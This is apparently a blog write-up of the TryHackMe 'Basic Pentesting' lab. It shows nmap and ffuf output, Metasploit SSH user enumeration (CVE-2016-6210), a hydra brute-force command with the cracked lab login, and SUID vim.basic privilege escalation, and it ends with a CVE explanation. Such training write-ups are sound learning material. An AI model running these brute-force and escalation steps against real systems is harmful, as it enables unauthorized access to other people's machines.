Basic Pentesting is an easy linux machine to test your skills to find vulnerabilities on a website and on the webserver, and perform privilege escalation. It was fun and gave me the opportunity to try an SSH user enumeration and to use Hydra.
Table of Contents
Scanning and Enumeration
I started with an Nmap scan, as usual:
Host is up (0.00060s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA) | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA) |_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (EdDSA) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.7 |_http-favicon: Apache Tomcat | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Apache Tomcat/9.0.7 MAC Address: 02:ED:F5:D0:86:EF (Unknown) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3.13 OS details: Linux 3.13 Uptime guess: 0.024 days (since Sun Mar 12 16:03:27 2023) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | BASIC2<00> Flags: <unique><active> | BASIC2<03> Flags: <unique><active> | BASIC2<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | WORKGROUP<00> Flags: <group><active> | WORKGROUP<1d> Flags: <unique><active> |_ WORKGROUP<1e> Flags: <group><active> | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: basic2 | NetBIOS computer name: BASIC2\x00 | Domain name: \x00 | FQDN: basic2 |_ System time: 2023-03-12T12:38:26-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2023-03-12 16:38:26 |_ start_date: 1600-12-31 23:58:45
It showed some interesting services and opportunities: Apache, Tomcat, JServ, SSH and SMB.
I’ve visited the websites on port 80 and port 8080, trying to find some point of access while in the background I’ve run the ffuf scans to find useful folders. The only interesting finding was a /development folder on the website on port 80:
.htpasswd [Status: 403, Size: 296, Words: 22, Lines: 12] .hta [Status: 403, Size: 291, Words: 22, Lines: 12] .htaccess [Status: 403, Size: 296, Words: 22, Lines: 12] development [Status: 301, Size: 318, Words: 20, Lines: 10] index.html [Status: 200, Size: 158, Words: 20, Lines: 11] server-status [Status: 403, Size: 300, Words: 22, Lines: 12]
Inside that folder there were two text files, messages from the developer. One in particular was to a colleague with the name starting with a “J”, referring to change the password as it can be easily cracked with a dictionary attack.
Exploitation
After writing down all the technologies and services on the system, I’ve looked for vulnerabilities and found out that the particular version of OpenSSH installed on this machine was vulnerable to user enumeration, so I tried to find the “J.” person using a Metasploit module with a sufficiently large username list:
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt USER_FILE => /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt msf6 auxiliary(scanner/ssh/ssh_enumusers) > run [*] 10.10.192.75:22 - SSH - Using malformed packet technique [*] 10.10.192.75:22 - SSH - Starting scan [+] 10.10.192.75:22 - SSH - User 'mail' found [+] 10.10.192.75:22 - SSH - User 'root' found [+] 10.10.192.75:22 - SSH - User 'news' found [+] 10.10.192.75:22 - SSH - User 'man' found [+] 10.10.192.75:22 - SSH - User 'bin' found [+] 10.10.192.75:22 - SSH - User 'games' found [+] 10.10.192.75:22 - SSH - User 'nobody' found [+] 10.10.192.75:22 - SSH - User 'jan' found [+] 10.10.192.75:22 - SSH - User 'backup' found [+] 10.10.192.75:22 - SSH - User 'daemon' found [+] 10.10.192.75:22 - SSH - User 'proxy' found etc.
I thought “jan” must have been the user I was looking for.
I’ve then run hydra with the classic “rockyou.txt” wordlist to find jan’s password:
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.192.75 ssh -V [...] [ATTEMPT] target 10.10.192.75 - login "jan" - pass "armando" - 780 of 14344400 [child 11] (0/2) [22][ssh] host: 10.10.192.75 login: jan password: armando
Password found. I was then able to login via ssh with the credentials jan:armando.
I’ve started to enumerate the system, finding out more about this user, the system, the services, the privileges, etc. The whole shebang.
What I noticed was that there was another user on the system, “kay” and it had a pass.bak file in his home folder (that was not readable by others).
Another interesting finding was the SUID programs for my current user, jan, because it had vim.basic. It’s a simpler version of vim which doesn’t have all the capabilities (like executing a shell), but it still allowed me to read files with root privileges, and it was enough to be able to read the pass.bak file of the user “kay”.
Inside a found something that looked like his password, and I used it to switch to the user “kay” (which had sudo privileges but it wasn’t the point of this CTF, that just requested his password as a flag).
An alternative way I found that could be used on this machine was to use the vim.basic not to just read kay’s password but, for example, to change the root’s password (by writing on the /etc/shadow file) to one of my choosing, which I could use to switch to the root account.
OpenSSH vulnerability
This TryHackMe room was solved thanks to 2 vulnerabilities: one of the SUID permissions (which I’ve already explained in a previous writeup) and one in the OpenSSH version of this machine, the OpenSSH 7.2p2.
This refers to the CVE-2016-6210, a vulnerability that affected the OpenSSH server versions 5.4 through 7.2. It is also known as the “user enumeration vulnerability” because it allowed remote attackers to determine valid usernames on a targeted system.
The vulnerability was caused by a flaw in the way OpenSSH handled authentication requests from unauthenticated users. By sending specially crafted authentication requests, an attacker could determine whether a particular user existed on the system, which could be used to facilitate further attacks, such as brute-force password guessing.
Some more details about this vulnerability are provided on the NVD website:
sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.
The vulnerability was discovered and reported by the Qualys Security Team in July 2016. The OpenSSH team released a patch for the vulnerability shortly after it was disclosed, and users were urged to update their installations as soon as possible.
